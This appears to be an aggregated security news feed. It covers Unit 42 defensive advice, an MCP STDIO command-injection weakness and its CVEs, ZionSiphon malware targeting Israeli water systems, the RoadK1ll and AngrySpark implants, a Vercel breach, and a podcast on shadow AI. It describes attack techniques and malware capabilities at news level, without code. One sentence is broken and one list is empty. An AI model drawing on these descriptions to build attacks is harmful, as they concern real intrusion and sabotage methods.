We know how cyberattacks are carried out. We know the forensic evidence they leave behind. We need to shift to hardened environments that are designed for prevention and rapid response.

What Security Teams Should Do Right Now

Unit 42 recommends a thorough review of your current security policies to adopt an aggressive prevention and response mindset. Mitigations that rely on active monitoring and response prior to containment will be outpaced by AI-assisted adversaries.

  • Operate under assumed breach conditions: Extend endpoint protection capabilities across all environments, preventing by default and monitoring at a minimum.
  • Establish code visibility and governance: Strictly manage and track the origin sources of OSS and assume package registries are no longer safe. Create a software bill of materials (SBOM) for all software to enable rapid identification and patching of integrated code libraries. Implement version pinning, hash checking and cooling-off periods for updates.
  • Harden development and build ecosystems: Restrict build systems from reaching the internet. Adopt secure vaults for developer secrets. Aggressively scan build environment and production networks for exposed secrets.
  • Collapse the patching window: Transition from routine maintenance to urgent, "time-to-deploy" enforcement. Use auto-updates and out-of-band releases to counter the AI-accelerated N-day threat.
  • Automate incident response pipelines: Deploy AI models to triage alerts, summarize technical events and conduct proactive threat hunts. Manual triage cannot scale to the volume of bugs a frontier AI model can discover.
  • Refresh vulnerability disclosure policies (VDPs): Prepare for an unprecedented volume of bug reports. Organizations must have automated workflows to ingest, validate and prioritize vulnerabilities.
  • Prioritize hard architectural barriers: Shift toward memory-safe languages and hardware-level isolation.

Conclusion

We are entering a period of significant volatility in the cybersecurity landscape. In the short term, the proliferation of frontier AI models capabilities risks empowering adversaries to exploit zero-days and N-days at an unprecedented scale. We are talking about N-hours instead of N-days. It is also likely to enable attackers to move at greater scale, sophistication and speed than ever before. However, this is just a transition period as defenders adapt to the new speed and scale of AI-enabled threats.

The ultimate goal of this transitory period is a future where defensive capabilities dominate, and where AI models are used to identify and fix bugs faster and earlier than threat actors. Unit 42 is committed to ensuring that defenders remain ahead of threat actors. We will continue to aggressively hunt, analyze and report threat intelligence to enable defenders.

Watch our live threat briefing from Thursday, April 16, as Sam Rubin, SVP, Consulting and Threat Intelligence, Unit 42, and Marc Benoit, CISO, Palo Alto Networks discuss how frontier AI models find and exploit previously undetected exposures at machine scale and speed,  and share practical steps security leaders need to take now to adapt their defenses to avoid business disruption. Watch now.



from Unit 42 https://ift.tt/NPTMS3s
via IFTTT

Anthropic MCP Design Vulnerability Enables RCE, Threatening AI Supply Chain

Cybersecurity researchers have discovered a critical "by design" weakness in the Model Context Protocol's (MCP) architecture that could pave the way for remote code execution and have a cascading effect on the artificial intelligence (AI) supply chain.

"This flaw enables Arbitrary Command Execution (RCE) on any system running a vulnerable MCP implementation, granting attackers direct access to sensitive user data, internal databases, API keys, and chat histories," OX Security researchers Moshe Siman Tov Bustan, Mustafa Naamnih, Nir Zadok, and Roni Bar said in an analysis published last week.

The cybersecurity company said the systemic vulnerability is baked into Anthropic's official MCP software development kit (SDK) across any supported language, including Python, TypeScript, Java, and Rust. In all, it affects more than 7,000 publicly accessible servers and software packages totaling more than 150 million downloads.

At issue are unsafe defaults in how MCP configuration works over the STDIO (standard input/output) transport interface, resulting in the discovery of 10 vulnerabilities spanning popular projects like LiteLLM, LangChain, LangFlow, Flowise, LettaAI, and LangBot -

  • CVE-2025-65720 (GPT Researcher)
  • CVE-2026-30623 (LiteLLM) - Patched
  • CVE-2026-30624 (Agent Zero)
  • CVE-2026-30618 (Fay Framework)
  • CVE-2026-33224 (Bisheng) - Patched
  • CVE-2026-30617 (Langchain-Chatchat)
  • CVE-2026-33224 (Jaaz)
  • CVE-2026-30625 (Upsonic)
  • CVE-2026-30615 (Windsurf)
  • CVE-2026-26015 (DocsGPT) - Patched
  • CVE-2026-40933 (Flowise)

These vulnerabilities fall under four broad categories, effectively triggering remote command execution on the server -

  • Unauthenticated and authenticated command injection via MCP STDIO
  • Unauthenticated command injection via direct STDIO configuration with hardening bypass
  • Unauthenticated command injection via MCP configuration edit through zero-click prompt injection
  • Unauthenticated command injection through MCP marketplaces via network requests, triggering hidden STDIO configurations

"Anthropic's Model Context Protocol gives a direct configuration-to-command execution via their STDIO interface on all of their implementations, regardless of programming language," the researchers explained.

"As this code was meant to be used in order to start a local STDIO server, and give a handle of the STDIO back to the LLM. But in practice it actually lets anyone run any arbitrary OS command, if the command successfully creates an STDIO server it will return the handle, but when given a different command, it returns an error after the command is executed."

Interestingly, vulnerabilities based on the same core issue have been reported independently over the past year. They include CVE-2025-49596 (MCP Inspector), LibreChat (CVE-2026-22252), WeKnora (CVE-2026-22688), @akoskm/create-mcp-server-stdio (CVE-2025-54994), and Cursor (CVE-2025-54136).

Anthropic, however, has declined to modify the protocol's architecture, citing the behavior as "expected. While some of the vendors have issued patches, the shortcoming remains unaddressed in Anthropic's MCP reference implementation, causing developers to inherit the code execution risks.

The findings highlight how AI-powered integrations can inadvertently expand the attack surface. To counter the threat, it's advised to block public IP access to sensitive services, monitor MCP tool invocations, run MCP-enabled services in a sandbox, treat external MCP configuration input as untrusted, and only install MCP servers from verified sources.

"What made this a supply chain event rather than a single CVE is that one architectural decision, made once, propagated silently into every language, every downstream library, and every project that trusted the protocol to be what it appeared to be," OX Security said. "Shifting responsibility to implementers does not transfer the risk. It just obscures who created it."



from The Hacker News https://ift.tt/hMdGYrC
via IFTTT

Researchers Detect ZionSiphon Malware Targeting Israeli Water, Desalination OT Systems

Cybersecurity researchers have flagged a new malware called ZionSiphon that appears to be specifically designed to target Israeli water treatment and desalination systems.

The malware has been codenamed ZionSiphon by Darktrace, highlighting its ability to set up persistence, tamper with local configuration files, and scan for operational technology (OT)-relevant services on the local subnet. According to details on VirusTotal, the sample was first detected in the wild on June 29, 2025, right after the Twelve-Day War between Iran and Israel that took place between June 13 and 24.

"The malware combines privilege escalation, persistence, USB propagation, and ICS scanning with sabotage capabilities aimed at chlorine and pressure controls, highlighting growing experimentation with politically motivated critical infrastructure attacks against industrial operational technologies globally," the company said.

ZionSiphon, currently in an unfinished state, is characterized by its Israel-focused targeting, going after a specific set of IPv4 address ranges that are located within Israel -

  • 2.52.0[.]0 - 2.55.255[.]255
  • 79.176.0[.]0 - 79.191.255[.]255
  • 212.150.0[.]0 - 212.150.255[.]255

Besides encoding political messages that claim support for Iran, Palestine, and Yemen, the malware embeds Israel-linked strings in its target list that correspond to the nation's water and desalination infrastructure. It also includes checks to ensure that in those specific systems.

"The intended logic is clear: the payload activates only when both a geographic condition and an environment-specific condition related to desalination or water treatment are met," the cybersecurity company said.

Once launched, ZionSiphon identifies and probes devices on the local subnet, attempts protocol-specific communication using Modbus, DNP3, and S7comm protocols, and modifies local configuration files by tampering with parameters associated with chlorine doses and pressure. An analysis of the artifact has found the Modus-oriented attack path to be the most developed, with the remaining two only including partially functional code, indicating that the malware is still likely in development.

A notable aspect of the malware is its ability to propagate the infection over removable media. On hosts that do not meet the criteria, it initiates a self-destruct sequence to delete itself.

"Although the file contains sabotage, scanning, and propagation functions, the current sample appears unable to satisfy its own target-country checking function even when the reported IP falls within the specified ranges," Darktrace said. "This behavior suggests that the version is either intentionally disabled, incorrectly configured, or left in an unfinished state."

"Despite these limitations, the overall structure of the code likely indicates a threat actor experimenting with multi‑protocol OT manipulation, persistence within operational networks, and removable‑media propagation techniques reminiscent of earlier ICS‑targeting campaigns."

The disclosure coincides with the discovery of a Node.js-based implant called RoadK1ll that's designed to maintain reliable access to a compromised network while blending into normal network activity.

"RoadK1ll is a Node.js-based reverse tunneling implant that establishes an outbound WebSocket connection to attacker-controlled infrastructure and uses that connection to broker TCP traffic on demand," Blackpoint Cyber said.

"Unlike a traditional remote access trojan, it carries no large command set and requires no inbound listener on the victim host. Its sole function is to convert a single compromised machine into a controllable relay point, an access amplifier, through which an operator can pivot to internal systems, services, and network segments that would otherwise be unreachable from outside the perimeter."

Last week, Gen Digital also took the wraps off a virtual machine (VM)-obfuscated backdoor that was observed on a single machine in the U.K. and operated for about a year, before vanishing without any trace when its infrastructure expired. The implant has been dubbed AngrySpark. It's currently not known what the end goals of the activity were.

"AngrySpark operates as a three-stage system," the company explained. "A DLL masquerading as a Windows component loads via the Task Scheduler, decrypts its configuration from the registry, and injects position-independent shellcode into svchost.exe. That shellcode implements a virtual machine."

"The VM processes a 25KB blob of bytecode instructions, decoding and assembling the real payload – a beacon that profiles the machine, phones home over HTTPS disguised as PNG image requests, and can receive encrypted shellcode for execution."

The result is malware capable of establishing stealthy persistence, altering its behavior by switching the blob, and setting up a command-and-control (C2) channel that can fly under the radar.

"AngrySpark is not only modular, it is also careful about how it appears to defenders," Gen added. "Several design choices look specifically aimed at frustrating clustering, bypassing instrumentation, and limiting the forensic residue left behind. The binary's PE metadata has been deliberately altered to confuse toolchain fingerprinting."



from The Hacker News https://ift.tt/cZl5vIj
via IFTTT

Vercel Breach Tied to Context AI Hack Exposes Limited Customer Credentials

Web infrastructure provider Vercel has disclosed a security breach that allows bad actors to gain unauthorized access to "certain" internal Vercel systems.

The incident stemmed from the compromise of Context.ai, a third-party artificial intelligence (AI) tool, that was used by an employee at the company.

"The attacker used that access to take over the employee's Vercel Google Workspace account, which enabled them to gain access to some Vercel environments and environment variables that were not marked as 'sensitive,'" the company said in a bulletin.

Vercel said environment variables marked as "sensitive" are stored in an encrypted manner that prevents them from being read, and that there is currently no evidence suggesting that those values were accessed by the attacker.

It described the threat actor behind the incident as "sophisticated" based on their "operational velocity and detailed understanding of Vercel's systems." The company also said it's working with Google-owned Mandiant and other cybersecurity firms, as well as notifying law enforcement and engaging with Context.ai to better understand the full scope of the breach.

A "limited subset" of customers is said to have had their credentials compromised, with Vercel reaching out to them directly and urging them to rotate their credentials with immediate effect. The company is continuing to investigate what data was exfiltrated, and plans to contact customers if further evidence of compromise is discovered.

Vercel is also advising Google Workspace administrators and Google account owners to check for the following application OAuth application:

110671459871-30f1spbu0hptbs60cb4vsmv79i7bbvqj.apps.googleusercontent.com

As additional mitigations, the following best practices have been recommended -

While Vercel has yet to share details about which of its systems were broken into, how many customers were affected, and who may be behind it, a threat actor using the ShinyHunters persona has claimed responsibility for the hack, selling the stolen data for an asking price of $2 million.

"We've deployed extensive protection measures and monitoring. We've analyzed our supply chain, ensuring Next.js, Turbopack, and our many open source projects remain safe for our community," Vercel CEO Guillermo Rauch said in a post on X.

"In response to this, and to aid in the improvement of all of our customers’ security postures, we've already rolled out new capabilities in the dashboard, including an overview page of environment variables, and a better user interface for sensitive environment variable creation and management."



from The Hacker News https://ift.tt/5BclpCx
via IFTTT

Sunday, April 19, 2026

Getting Shadow IT under control

SUMMARY: Shadow AI is growing much faster than known AI adoption across businesses. How can IT teams get Shadow AI under control?

GUEST: Uri Haramati, CEO at Torii

SHOW: 1020

SHOW TRANSCRIPT: The Reasoning Show #1020 Transcript

SHOW VIDEO: https://youtu.be/AUrh_xICPzM

SHOW SPONSORS:

SHOW NOTES:


Topic 1 - Welcome to the show. Tell us about your background and your focus at Torii. 

Topic 2 - Is Shadow AI really a security problem—or is it a product-market fit problem inside the enterprise?

Topic 3 - Why does Shadow AI spread faster—and become more dangerous—than traditional Shadow IT?

Topic 4 - What’s the first signal a company should look for to know Shadow AI is already happening?

Topic 5 - How do you balance visibility vs. control without killing the productivity gains that drove Shadow AI in the first place?

Topic 6 - How should organizations rethink ‘data loss prevention’ in a world where the leak is a prompt, not a file?

Topic 7 - What does a ‘well-governed’ AI environment actually look like in practice—day-to-day for an employee?

Topic 8 - “Do you think Shadow AI ever fully goes away—or does it become a permanent operating model that companies need to design around?”

FEEDBACK?



from The Cloudcast (.NET) https://ift.tt/QBROUg9
via IFTTT